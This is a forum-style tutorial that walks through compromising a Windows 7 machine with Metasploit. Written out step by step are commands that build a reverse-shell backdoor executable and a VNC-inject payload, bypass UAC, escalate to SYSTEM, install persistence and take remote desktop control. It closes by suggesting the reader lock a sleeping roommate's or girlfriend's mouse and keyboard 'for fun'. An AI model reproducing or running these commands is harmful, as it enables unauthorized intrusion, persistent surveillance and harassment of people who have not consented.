How to Run an VNC Server on Win7

OTW's great Tutorial Hack Like a Pro: How to Save the World from Nuclear Annihilation gives me the inspiration to try this on Win7 sp1.

I did this under Bugtraq 2 Black Widow but it works almost similar on Kali-Linux.

Step 1: Start All Services Und Run Metasploit

On bugtraq not preinstalled so:

# sudo apt-get install vncviewer

Than start the required services:

# sudo service postgresql start

# sudo service metasploit start

# sudo msfconsole

Step 2: We Need Two Payloads

I did this with msfpayload:

First we need the meterpreter

msf > msfpayload windows/meterpreter/reversetcp LHOST= LPORT= x > /home/bugtraq/Desktop/backdoor.exe

Now we got the file backdoor.exe on our Desktop now we need another .exe file that we will upload to our target and execute with the meterpreter.

msf > msfpayload windows/vncinject/reversetcp LHOST=

LPORT= x > /home/bugtraq/Desktop/gui.exe

Step 3: Lets Run the Meterpreter and Bypass the UAC

msf > use multi/handler

msf exploit(handler) > set payload windows/meterpreter/reversetcp

msf exploit(handler) > set LHOST

msf exploit(handler) > set LPORT

msf exploit(handler) > exploit

So we see that the meterpreter is running on our target but we need more system rights.

meterpreter > getprivs

meterpreter > getsystem

Access Denied!!

Should not be a big problem

You can look you Privs with the command

meterpreter > run post/windows/gather/winprivs

meterpreter > background

msf exploit(handler) > use exploit/windows/local/bypassuac

msf exploit(bypassuac) > set payload windows/meterpreter/reversetcp

msf exploit(bypassuac) > set LHOST

msf exploit(bypassuac) > set LPORT

msf exploit(bypassuac) > set session 1

msf exploit(bypassuac) > exploit

If that happens only try again

msf exploit (bypassuac) > exploit

works, now:

meterpreter > getsystem

meterpreter > getprivs

Now we should owned the system but we want to have an VNC on the target.

If you want to make the meterpreter persistence should something go wrong just type

meterpreter > run persistence –A –L c:\\ -X 5 –p –r

Step 4: Now the Funny Part

the meterpreter got the download and upload function and the works like this

meterpreter > upload -r /home/bugtraq/Desktop/gui.exe C:/

Now we open a second metasploit terminal and type in

msf > use multi/handler

msf exploit(handler) > set payload windows/vncinject/reversetcp

msf exploit(handler) > set LHOST

msf exploit(handler) > set LPORT

msf exploit(handler) > exploit

It should now look like this

Step 5: Getting Finished...

Now we go back to our meterpreter terminal, make sure you are in the folder C:/ where the gui.exe file is and type in

meterpreter > execute -f gui.exe

Previous SlideNext Slide

Step 6: MUCH More FUN

Lets say in front of our target pc sleeps a person(roomate/girlfriend/whatever), if you want to wake him/her in an anoying way search his musik and have some Fun hehe,

meterpreter > uictl disable mouse

meterpreter > uictl disable keyboard

and have fun :D

I am sure there are better ways to do this hack

but it works, suggestions for improvement are always welcome!

Hope you enjoyed